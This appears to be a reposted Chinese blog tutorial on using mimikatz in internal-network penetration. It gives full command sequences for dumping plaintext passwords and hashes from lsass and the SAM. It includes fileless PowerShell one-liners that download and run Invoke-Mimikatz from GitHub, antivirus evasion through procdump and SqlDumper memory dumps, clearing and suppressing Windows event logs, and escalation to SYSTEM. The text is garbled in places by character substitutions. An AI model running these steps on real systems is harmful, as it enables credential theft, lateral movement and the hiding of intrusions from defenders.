转自:小橘子基地
近来在工作中用到了一个内网渗出工具mimkatz,感觉很不错,将一些简单的利用方法分享给各人。
一、mimikatz简介:
mimikatz常用于获取windows体系明文暗码、体系账号hash、欣赏器暗码、VPN(ADSL)暗码、RDP终端暗码等,在内网横向渗出中可用于各种凭据的导入导出,包罗各人认识的hash转达攻击。
程序的发布主页:http://blog.gentilkiwi.com/mimikatz
下载地点:https://github.com/gentilkiwi/mimikatz/releases
二、底子用法——获取windows体系明文暗码及HASH:
起首用管理员权限打开猕猴桃标记的EXE,然后输入:
privilege::debug
sekurlsa::logonpasswordsfull
假如先加上log下令,全部的操纵和回显的结果会在mimikatz.log中表现:
三、结果分析:
从上面结果可以看出:
1、一个AuthenticationId代表一个块结果(这个“块结果”我本身明白的),也就是内存内里某个账户内里的凭据。
2、msv项是账号对应的暗码的各种加密协议的密文。
3、tspkg、wdigest、kerberos这3个项是账号对应的明文暗码,但偶然间不是3个项都得到结果的。
4、ssp项下是你最新登录到其他RDP终端所用到账号暗码,windowsserver2003、windowsxp是不会记录到这里的,由于账号暗码的输入不在本机内存里。
5、domain项是被登岸的呆板的USERDOMAIN,可通过set下令来查察该变量,通过ping该项对应的值,可得到目标的IP。如:ping-n1john-PC,假如想要是IPv4就加上-4参数,即:ping-n1-4john-PC
四、获取windows体系明文暗码的原理:
当用户登岸后,会把账号暗码生存在lsass中,lsass是微软Windows体系的安全机制它重要用于本地安全和登岸战略,通常我们在登岸体系时输入暗码之后,暗码便会储存在lsass内存中,颠末其wdigest和tspkg两个模块调用后,对其利用可逆的算法举行加密并存储在内存之中,而mimikatz正是通过对lsass的逆算获取到明文暗码。
五、获取体系哈希:
1、mimikatzwithreg(online在线获取)
privilege::debug
token::elevate
lsadump::sam
2、mimikatzwithreg(offline)
目标呆板上实行:
regsaveHKLM\SYSTEMSystemBkup.hiv
regsaveHKLM\SAMSamBkup.hiv
把两个文件传回本机后实行:
mimikatz#lsadump::sam/system:SystemBkup.hiv/sam:SamBkup.hiv
3、mimikatzwithpowershell(无需实体文件落地)
powershellIEX(New-ObjectNet.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1');Invoke-Mimikatz
powershellIEX(New-ObjectNet.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes
六、windows高版本无法抓明文暗码的题目:
题目出现点,windows8.1及以上体系在举行明文暗码抓取的时间出现以下环境:
1、报错:
ERRORkuhl_m_sekurlsa_acquireLSA;Logonlist
2、暗码项为NULL//空暗码
七、mimikatz的杀软对抗:
mimikatz的明文暗码功能固然是强大的,但就是由于强大,以是在被各国黑客关注利用的同时,各国的安全厂商也是会投入人力物力去查杀该程序,由此就会产生对抗安全防御软软件的技能。以下文章所涉及到的都是常用且好用的。
1、procdumpwithmimikatz
procdump是啥玩意?
procdump是微软收购Winternals公司后得到的一个工具包SysinternalsSuite中的一款小工具,属于微软产物。详情请看:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
为什么能对抗安全防御软件?
我们利用大厂的软件把windows体系的内存dump出来,然后下载回我们本地体系,通过mimikatz分析内存文件,提取存放在内存中的凭据。那我用微软的东西,你不能拦截吧?那我在本地本身没有安全软件的环境用mimikatz分析,能拦截的估计就是断电、蓝屏……
具体操纵:
下令:
目标呆板
procdump64.exe-accepteula-malsass.exelsass.dmp
本机
mimikatz#sekurlsa::minidumpSUPERCOMPUTER_lsass.dmp
mimikatz#log
mimikatz#sekurlsa::logonPasswordsfull
①起首在目标呆板下载一个procdump文件,然后用管理员权限打开cmd输入下令实行(末了谁人lsass.dmp是文件名,它的文件名和后缀都可以更改)
②接着我们把lsass.dmp文件下载返来,然后打开mimikatz实行下令即可(留意下令中文件名要对的上)
2、SqlDumperwithmimikatz
SqlDumper.exe是从SQLServer安装目次下提取出来的,功能和Procdump相似,而且也是微软出品的,体积远小于Procdump,也具备肯定的免杀功能。SqlDumper.exe默认存放在C:\ProgramFiles\MicrosoftSQLServer\number\Shared,number代表SQLServer的版本,假如目标呆板没有安装SQLServer,可以本身上传一个SqlDumper.exe。
下令:
目标呆板
tasklist/svc|findstrlsass.exe
Sqldumper.exeProcessID00x01100
本机
mimikatz#sekurlsa::minidumpSQLDmpr0001.mdmp
mimikatz#log
mimikatz#sekurlsa::logonPasswordsfull
八、mimikatz的其他实勤奋能
1、办理windowsPC版本不能多用户登岸3389的环境:
mimikatz#privilege::debug
mimikatz#ts::multirdp
2、打扫日记:
event::clear
3、让背面的操纵不被体系记录:
event::drop
4、进程操纵:
process::suspend/pid:2768停息进程
process::resume/pid:2768规复进程
5、获取system权限
privilege::debug
token::elevate
6、以system权限启新的进程
获取体系system
mimikatz#privilege::debug
mimikatz#process::runp//以system启动一个新的mimikatz的交互式shell
mimikatz#process::runp/run:cmd//以system启动一个新的cmd
OK,以上就是本期的全部内容啦,欢迎各人转发关注收藏!
END
官方站点:www.linuxprobe.com
Linux下令大全:www.linuxcool.com
(新群,火热加群中……)
CopyrightYourWebSite.SomeRightsReserved.
京ICP备2023016396号-1PoweredByESCLINK.
我要评论